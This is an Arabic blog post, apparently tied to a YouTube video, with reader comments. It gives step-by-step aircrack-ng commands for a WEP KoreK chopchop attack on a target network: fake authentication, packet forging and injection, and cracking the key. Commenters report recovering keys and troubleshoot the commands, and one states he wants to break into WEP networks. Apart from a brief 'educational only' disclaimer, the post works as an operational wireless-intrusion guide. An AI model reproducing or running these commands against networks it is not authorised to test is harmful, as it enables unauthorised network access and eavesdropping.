فيديو: WEP korek chopchop attack
ملاحظة: الشرح من توزيعة backtrack3 ويمكن تطبيقه من أي توزيعة لينكس اخرى بعد تثبيت حزمة aircrack-ng.
الفيديو للغرض التعليمي فقط و أنا غير مسؤول عن أي استخدام خاطئ للمعلومات المذكورة في الشرح
الفيديو:
http://www.youtube.com/watch?v=KecIVQLHfvw
الخطوات:
1. سنحتاج الى وضع كرت الوايرلس في الـ monitor mode بتنفيذ الأمر:
airmon-ng start [interface]حيث: interface هو اسم كرت الوايرلس الخاص بك.
2. استخدام برنامج airodump-ng لمشاهدة الشبكات المتوفرة بتنفيذ الأمر:
airodump-ng [interface]
3. تشغيل برنامج airodump-ng لجمع الحزم من الشبكة الهدف
airodump-ng -c [channel] –bssid [target BSSID] -w out [interface]حيث:
channel القناة اللتي تعمل عليها الشبكة
bssid الماك ادرس الخاص بالشبكة
out اسم الملف الذي ستحفظ فيه الحزم
4. عمل fake authentication للـ AP الخاص بنا على الشبكة الهدف حتى نستطيع تنفيذ chopchop attack في الخطوة القادمة
توضيح: اذا قمنا بنفيذ chopchop attack مباشرة دون القيام بهذه الخطوة فان الشبكة الهدف ستقوم بارسال حزم deauthentication و بالتالي سيفشل الهجوم و لذلك سنقوم بعمل fake authentication (تصريح مزيف) لجهازنا لنتمكن من تنفيذ chopchop attack
ملاحظة: بعد تنفيذ هذه الخطوة سوف تشاهد ظهور كلمة OPN في حقل AUTH في نافذة برنامج airodump-ng.
حيث:
target bssid ماك أدرس الخاص بالشبكة
source MAC address ماك أدرس الخاص بك و يمكننا معرفته من خلال تنفيذ الامر
حيث: target essid اسم الشبكة الهدف
5. استخدام برنامج aireplay-ng للبدء بالـ chopchop attack
aireplay-ng -4 -b [target BSSID] -h [source MAC address (your MAC)] [interface]
6. استخدام برنامج packetforge لتكوين حزمة arp التي سوف نحقنها في الشبكة الهدف
packetforge-ng -0 -a [target BSSID] -h [source MAC] -k [destination IP in fragments] -l [source IP in fragments] -y arp.xor -w [output2]
7. حقن الحزمة المكونة في الخطوة 6 باستخدام برنامج aireplay-ng
aireplay-ng -2 -r [output2] [interface]حيث: r- الحزمة المكونة في الخطوة السابقة
8. فك التشفير بالستخدام برنامج aircrack-ng
aircrack-ng [file]حيث: file الملف الذي تم تخزين الحزم فية من الخطوة 3
ان شاء الله يكون الشرح واضح و اي استفسار اني حاضر
دمتم بود
Zaid S.Hussien
مرحبا زيد,
شرح جميل الصراحة ولكن ينقصة الصوت, لو كان مع الصوت لكان اسهل للمبتدئين.
كما عودتنا شرح رائع وجميل 🙂
شكرا زيد وبانتظار المزيد من الشروحات والمواضيع عن الـ Wireless Hacking 😛
Mustafa Albazy:شكرا على مرورك,طبعا فكرت باضافة صوت للفيديو لكنني ترددت ربما في المستقبل.
عبد المهيمن:منور الموضوع و شكرا على التشجيع
ICEMAN:الامر
airmin-ng stop [interface]
يستخدم لايقاف كارد تم وضعه في الـmonitor mod مسبفا
اما بالنسبة لي فلم بكن الكارد الخاص بي في الـMonitor mod لذك قمت بوضعه في المونيتور مود
مشكور على الشرح
بس في البداية نسيت
[airmon-ng stop [interface
قبل النقطة رقم 1
ومشكور للامام
السلام عليكم
مشكور على الشرح الرائع بس البرنامج عندي يبقى يجمع حزم
حيث يبقى يجمع حزم ولا تظهر لي رسالة
do you want to use these packets ?
يستمر بجمع الحزم فقط ولمدة طويلة
حل يوجد حل ؟ او ما هي المشكلة بالضبط ؟
اخي زيد رحمه الله والديك على الشرح
عندي سؤال بالنسبة للخطوة
packetforge-ng -0 -a [target BSSID] -h [source MAC] -k [destination IP in fragments] -l [source IP in fragments] -y arp.xor -w [output2]
شنو هذا الرقم الي وضعته 255.255.255.255 destination IP in fragments
والرقم الي بعده ايضا 255.255.255.255.255 source IP in fragments
انا لدي فقط subnetmask وهو 255.255.255.0
وشكرا لك وصيام مقبول ان شاء الله
اخي الكريم سؤال ثاني انا طبقت على شبكتين الاولى ظهر لي في بداية الامر مشكلة في عدم نجاح عملية chopchop attack في الخطوة 5 ولكن عند تكراراها نحجت وظهر لي المفتاح
على شكل 78:03:15:18:25 هل هذا هو الكي صحيح ؟
والشبكة الثانية المشكلة في Essid اقواس مثلاً isecur1ty (h) 07756451
عند تطبيق الخطوة رقم 4 عمل fake authentication
يظهر لي خطأ وهو
bash:syntax error near unexpexted token ‘(‘ what this problem –
وان شاء الله ماسويت عليك زحمة
موفق ان شاء الله
a.j:جرب اعادة الخطوة 4 اثناء عملية جمع الحزم
مهند:لا النت ماسك غير
و نعم هذا هو المفتاح الصحيح
اما بالنسبة لاسم الشبكة اذا احتوى على فراغات فيجب وضعه في علامات تنصيص “” و ليس داخل اقواس
مثال:
“network essid”
يطلع خطا
Command ‘aireplay-ng’ is available in ‘/usr/sbin/aireplay-ng’
The command could not be located because ‘/usr/sbin’ is not included in the PATH environment variable.
This is most likely caused by the lack of administrative priviledges associated with your user account.
bash: aireplay-ng: command not found
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
السلام عليكم اخي العزيز انا اهنئك على هذا الموقع والله يوفقك بس انا عندي سؤال بسيط واتمنى ما تبخل علي باإجابة
انا عندي وايرلس wusb54gc rt73 واسوي بحث ولكن هل احتاج الى تحديث الوايرلس
مثل هذه الروابط مع العلم انا اريد فقط اختراق wep
bt ~ # wget http://homepages.tu-darmstadt…..1.tar.bz2
bt ~ # wget http://www.offensive-security.com/kernel.lzm
واتمنى اخوي تجاوبني على السؤال واكون مشكور
سلام عليك أخي أشكرك
هل برنامج packetforge موجود في نسخة باك تراك 3؟
إن كان لا من أين أحمله؟ وكيف أتبته ؟
الله بارك فيك